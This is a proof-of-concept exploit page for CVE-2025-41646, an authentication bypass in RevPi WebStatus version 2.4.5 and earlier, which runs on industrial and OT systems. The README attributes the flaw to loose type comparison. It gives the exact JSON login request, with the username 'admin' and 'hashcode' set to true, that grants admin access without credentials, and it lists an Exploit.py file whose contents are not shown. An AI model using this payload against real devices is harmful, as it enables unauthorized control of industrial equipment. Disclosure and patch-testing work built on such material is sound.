CVE-2025-41646 PoC — RevPi Webstatus application is vulnerable to an authentication bypass

Source

Associated Vulnerability

Description

CVE-2025-41646 - Critical Authentication bypass

Readme

# CVE-2025-41646---Critical-Authentication-Bypass-
CVE-2025-41646 - Critical Authentication bypass

# 🔓 CVE-2025-41646 - RevPi WebStatus Authentication Bypass PoC

A critical authentication bypass vulnerability (CVE-2025-41646) in RevPi WebStatus ≤ v2.4.5 allows an attacker to log in as **admin** without valid credentials due to weak type comparison logic (`==` vs `===`).

---

## 📌 Affected

- RevPi WebStatus v2.4.5 and below
- Industrial/OT systems running on Raspbian with Apache

---

## 💥 Exploitation

Send a login request with:

```json
{
  "mode": "LOGIN",
  "username": "admin",
  "hashcode": true
}

File Snapshot

 [4.0K]  /data/pocs/edc6123ade7c5003031d6e2c53a0bf394c62f7de
├── [ 701]  Exploit.py
└── [ 624]  README.md

0 directories, 2 files

Remarks